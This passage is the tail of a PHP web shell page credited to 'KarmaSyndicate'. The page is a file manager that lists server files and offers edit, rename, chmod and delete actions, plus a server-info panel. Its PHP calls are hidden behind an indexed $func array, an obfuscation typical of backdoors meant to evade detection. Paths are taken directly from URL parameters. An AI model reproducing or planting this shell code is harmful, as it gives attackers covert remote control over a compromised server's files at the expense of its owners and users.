<a data-bs-toggle="collapse" href="#newFileCollapse" role="button" aria-expanded="false" aria-controls="newFileCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-plus"></i></a>
<a data-bs-toggle="collapse" href="#newInfoServer" role="button" aria-expanded="false" aria-controls="newInfoServer" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-info"></i></a>
</div>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
<?php
foreach ($dirs as $dir) :
if (!is_file($dir)) continue;
?>
<tr>
<td>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=view" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> <?= $dir ?></a>
</td>
<td class="text-light"><?= ($func[25]('mime_content_type') ? $func[24]($dir) : $func[8]($dir)) ?></td>
<td class="text-light"><?= $func[26]($dir) ?></td>
<td class="text-light"><?= $func[35]($dir) ?></td>
<td class="text-light"><?= $func[11]($func[10]('%o', $func[6]($dir)), -4); ?></td>
<td class="text-light"><?= $func[23]("Y-m-d h:i:s", $func[7]($dir)); ?></td>
<td>
<?php if ($dir != '.' && $dir != '..') : ?>
<div class="btn-group">
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=edit" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=chmod" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-signature"></i></a>
<a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"><i class="fa fa-trash"></i></a>
</div>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<div class="text-light">© KarmaSyndicate <script type='text/javascript'>var creditsyear = new Date();document.write(creditsyear.getFullYear());</script></div>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script>
<script>
<?php if (isset($_SESSION['message'])) : ?>
Swal.fire(
'<?= $_SESSION['status'] ?>',
'<?= $_SESSION['message'] ?>',
'<?= $_SESSION['class'] ?>'
)
<?php endif; clear(); ?>
function deleteConfirm(url) {
event.preventDefault()
Swal.fire({
title: 'Are you sure?',
icon: 'warning',
showCancelButton: true,
confirmButtonColor: '#3085d6',
cancelButtonColor: '#d33',
confirmButtonText: 'Yes, delete it!'
}).then((result) => {
if (result.isConfirmed) {
window.location.href = url
}
})
}
function jscopy() {
var jsCopy = document.getElementById("CopyFromTextArea");
jsCopy.focus();
jsCopy.select();
document.execCommand("copy");
}
</script>
</body>
</html>